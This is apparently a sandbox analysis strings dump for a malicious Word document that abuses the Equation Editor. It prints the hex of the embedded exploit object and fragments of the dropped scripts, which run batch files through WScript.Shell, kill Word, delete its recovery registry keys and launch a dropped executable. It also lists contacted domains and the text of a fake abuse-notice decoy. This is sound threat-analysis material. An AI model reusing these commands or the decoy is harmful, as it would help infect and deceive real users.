000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C0000000000000461A0000004D6963726F736F667420B9ABCABD20332E3020D6D0CEC4B0E6000C0000004453204571756174696F6E000B0000004551754154696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF0000000000000000050F00001102000056010000010009000003AB00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02E001A00D1200000026060F001A00FFFFFFFF000010000000C0FFFFFFACFFFFFF600D00008C0100000B00000026060F000C004D61746854797065000030001C000000FB0280FE000000000000BC020000000004020040436F6D69632053616E73204D5300DFE8FEFFFFFF53180A3400000A0000000000040000002D0100000A000000320A80012E0905000000626302004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000007E010000000000006500510055004100540049004F004E0020004E00410054004900560045000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A00000061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000646566000C000000320A80011C000A000000313233343536373839610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000048008A0000000A00FA17660548008A00FFFFFFFFB8EC1900040000002D01010004000000F001000003000000000000001C0000000200BEC34500000000000000282468007CA8690000000000030000000000080000436D44202F432025746D70255C7461736B2E6261742020202020202020202020202026205555555555555555120C6300440002816500028166000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400E3090000D4F4FFFF020400000800E3092C0B0000010009000003FD01000005001C00000000000400000003010800050000000B0200000000050000000C02A4025702040000002E0118001C000000FB02A4FF0000000000009001000000000440002243616C6962726900000000000000000000000000000000000000000000000000040000002D010000040000002D010000040000002D010000040000000201010005000000090200000002030000001E00070000001604A4025602000000000C00000040096200FF0000000000000058025802FFFF000007000000FC020000FFFFFF020000040000002D01010007000000FC020000000000020000040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006004C02FFFF0600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005000000040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005005202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F00000000000000006004C0251020600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051025202040000002D010100040000002D0102000C00000040092100F0000000000000000600060051025202040000002D01010005000000090200000002050000000102FFFFFF0207000000FC020000FFFFFF000000040000002D010300040000002701FFFF040000002D010000040000002D010000040000002D010000050000000902000000020D000000320A5702580201000400000000005602A40220003600050000000902000000021C000000FB021000070000000000BC02000000000102022253797374656D0000690D461E2080AC1480C28B75D0811D00A004817580C28B75040000002D010400040000002D01040004000000F0010200030000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objemb\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objhtml\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

]yA%h0>UH=}Vx!#YAOi%E$K[|

Ansi based on Dropped File (~WRC0000.tmp)

_/_=_--',__-_-,_-_-,J

Ansi based on Image Processing (screen_6.png)

_::_::_

Ansi based on Image Processing (screen_3.png)

_n__::_::_

Ansi based on Image Processing (screen_6.png)

_n_ins

Ansi based on Image Processing (screen_3.png)

_sct_c_J_lnJ9r1_crcsc_crccr_tlcn_nllrl9htsr_s___d

Ansi based on Image Processing (screen_0.png)

`zI"~gcRHc#_Q0bG'|OJ:m)DD{j!3&FGG$Sg#AJ\bXkW'|GJsN[N4'!

Ansi based on Dropped File (~WRC0000.tmp)

able as this equation is being edited in a documentmScales the editing view to another magnificationNot available as this equation is being edited in a document

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ariable . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

atrix-Vector . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ay[Z|`nmsT79x<.

Ansi based on Dropped File (~WRC0000.tmp)

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

ber . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Best regards,

Ansi based on Dropped File (decoy.doc)

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

charactirc

Ansi based on Image Processing (screen_3.png)

classid="{204774CF-D251-4F02-855B-2BE70585184B}"

Ansi based on Dropped File (inteldriverupd1.sct)

CLSID\{0002CE02-0000-0000-C000-000000000046}\DefaultIcon

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

CLSID\{0002CE02-0000-0000-C000-000000000046}\LocalServer32

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

CompanyName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Coproduct with no limits Coproduct with underscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CreateInsitu Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

D]=^`_`}B26'YGLrBPK!Mword/fontTable.xmlMn0z9"=MSQo)+#J!<|x/)*!|H;

Ansi based on Dropped File (~WRC0000.tmp)

Ansi based on Dropped File (~WRS{E674B11D-078C-4013-8D68-BC57AFC19CCF}.tmp)

DeL %TMp%\inteldriverupd1.ScT

Ansi based on Dropped File (2nd.bat)

description="fjzmpcjvqp"

Ansi based on Dropped File (inteldriverupd1.sct)

dns-verifon.com

Ansi based on PCAP Processing (network.pcap)

dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

DOMAIN error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:

Ansi based on Dropped File (~WRC0000.tmp)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Dropped File (decoy.doc)

E@Sc. 6%pn5$CcT< /ANQxDS#\r""`t\Ss%=tD]1eA

Ansi based on Dropped File (decoy.doc)

ECHO OFFset uu="%TMp%\block.txt"IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)Del "%~f0"exit

Ansi based on Dropped File (task.bat)

Ansi based on Dropped File (2nd.bat)

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

em\currentcontrolset\control\keyboard layout

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

EO/)F;@Z$I2Uz<uLULhd6Xwf#3;"e3Y.s&KS[nA2{

Ansi based on Dropped File (~WRC0000.tmp)

EqnEdt32.EXE

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

eqnedt32.reg

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

EqnFrameWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

EQNINSITUCLASS

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation(Unable to write preferences to registry.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation.3\protocol\StdFileEditing\server

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ExitProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ext . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ext . . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

f^]Y-.CDtv5w>AvjW0zt*yPkGaJaxoI ;@"r+6

Ansi based on Dropped File (~WRC0000.tmp)

fldinst

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FMDFontListEnum

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FontInfoCacheW

Unicode based on Runtime Data (WINWORD.EXE )

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

GetACP

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetActiveWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetCommandLineA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetLastActivePopup

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocaleInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleFileNameA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProfileStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetStartupInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDefaultLangID

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetTickCount

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetTimeZoneInformation

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetVersion

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetWindowsDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

H=%s, W=%s, B=%d-Some resources are missing from EQNEDT32.EXE.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

http://cps.letsencrypt.org0

Ansi based on PCAP Processing (network.pcap)

IETldDllVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldDllVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)

Ansi based on Dropped File (task.bat)

ImmGetCompositionStringA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetConversionStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetOpenStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionFontA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

Integral with subscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

InterlockedCompareExchange

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

ion . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

l . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

LocalAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalLock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalReAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalUnlock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

l|Go:Ht<y%f.Kul16Z=I0{L`HS\CCop#O:7SiVP]KGrh$BFtZy]O+,{juZqBiit,$-my{q7HJL{PE/Fq$>

Ansi based on Dropped File (~WRC0000.tmp)

M4|/99:4j>PK!l~5%word/glossary/_rels/document.xml.relsMO0H(wn|

Ansi based on Dropped File (~WRC0000.tmp)

M9;c:}tQY}qdF!Vd!57~m$

Ansi based on Dropped File (~WRC0000.tmp)

Macro Insertion

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Visual C++ Runtime Library

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

msi.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MsiProvideQualifiedComponentA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MsoCommandBarPopup

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

MtInsituFilterClass

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MtInsituWndProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

NINSITUCLASS

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Object Descriptor

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ObjInfoLinkInfoFF82%TMp%\InTeLdRiVeRuPd1.ScTu~*Ff`7

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

ObjShell.Run "CmD /C %TeMp%\TaSk.BaT",0,True

Ansi based on Dropped File (inteldriverupd1.sct)

OleObjSetExtent called; x = %d, y = %d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

PK!+:P[Content_Types].xml (n0ED(,g6@]t#_0}QMl15YS@D]I[kUSx-76Ve'Qn

Ansi based on Dropped File (~WRC0000.tmp)

Please carefully examine log file sample and take action to prevent harmful traffic coming from your IP space.

Ansi based on Dropped File (decoy.doc)

q vh{nx=rbxpBwA3Q|&^7;l,{>4".7*YIK8_ummmhE#-U9ib_+IS(5m&gk]b

Ansi based on Dropped File (~WRC0000.tmp)

Q+ONQ&,A!@cOJ*]2`:@1xaC

Ansi based on Dropped File (~WRC0000.tmp)

Qw,T}LncIYFYl/XqVB^Fp2lo4X(|N1l>`f+gg<:_V=Y

Ansi based on Dropped File (~WRC0000.tmp)

QWDWIzI}4e+*b|:0sEpw{XuTZ?ej(dTdNe_\0)}c>V[*?2#

Ansi based on Dropped File (~WRC0000.tmp)

R6017- unexpected multithread lock error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6018- unexpected heap error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (reg.exe)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f

Ansi based on Dropped File (2nd.bat)

regedit /s

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

RegisterInsituClass Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

runtime error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Runtime Error!Program:

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

S*NLsRb_mTnL)H%x@h@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@CalibriA$BCambria Math"1hb5scg;;!n0KHP$PLsR2!xxFijiFijiOh+'0l

Ansi based on Dropped File (decoy.doc)

S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv

Ansi based on Dropped File (~WRC0000.tmp)

Script

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

scription

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ScriptScript

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SCROLLBAR

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

Set ObjShell = CreateObject("WScript.Shell")

Ansi based on Dropped File (inteldriverupd1.sct)

SetErrorMode

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SING error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Software\Microsoft\Equation Editor\3.0\Options

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Software\Microsoft\Office\Common\8.0\Command Bars\ButtonSize

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

start %TeMp%\ExE.ExE

Ansi based on Dropped File (2nd.bat)

StatBarFrame

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Subscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SubscriptDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SuperscriptHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

system\currentcontrolset\control\keyboard layout

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

taskkill /f /im WiNwOrD.ExE

Ansi based on Process Commandline (taskkill.exe)

taskkill /f /im WiNwOrD.ExE

Ansi based on Dropped File (2nd.bat)

TerminateProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

test1.ru

Ansi based on PCAP Processing (PCAP)

the Equation Editor version and copyright

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

The following attacks coming from your network space was logged by IBM Intruder Detection System.

Ansi based on Dropped File (decoy.doc)

This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/0

Ansi based on PCAP Processing (network.pcap)

TLOSS error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn

Ansi based on Dropped File (~WRC0000.tmp)

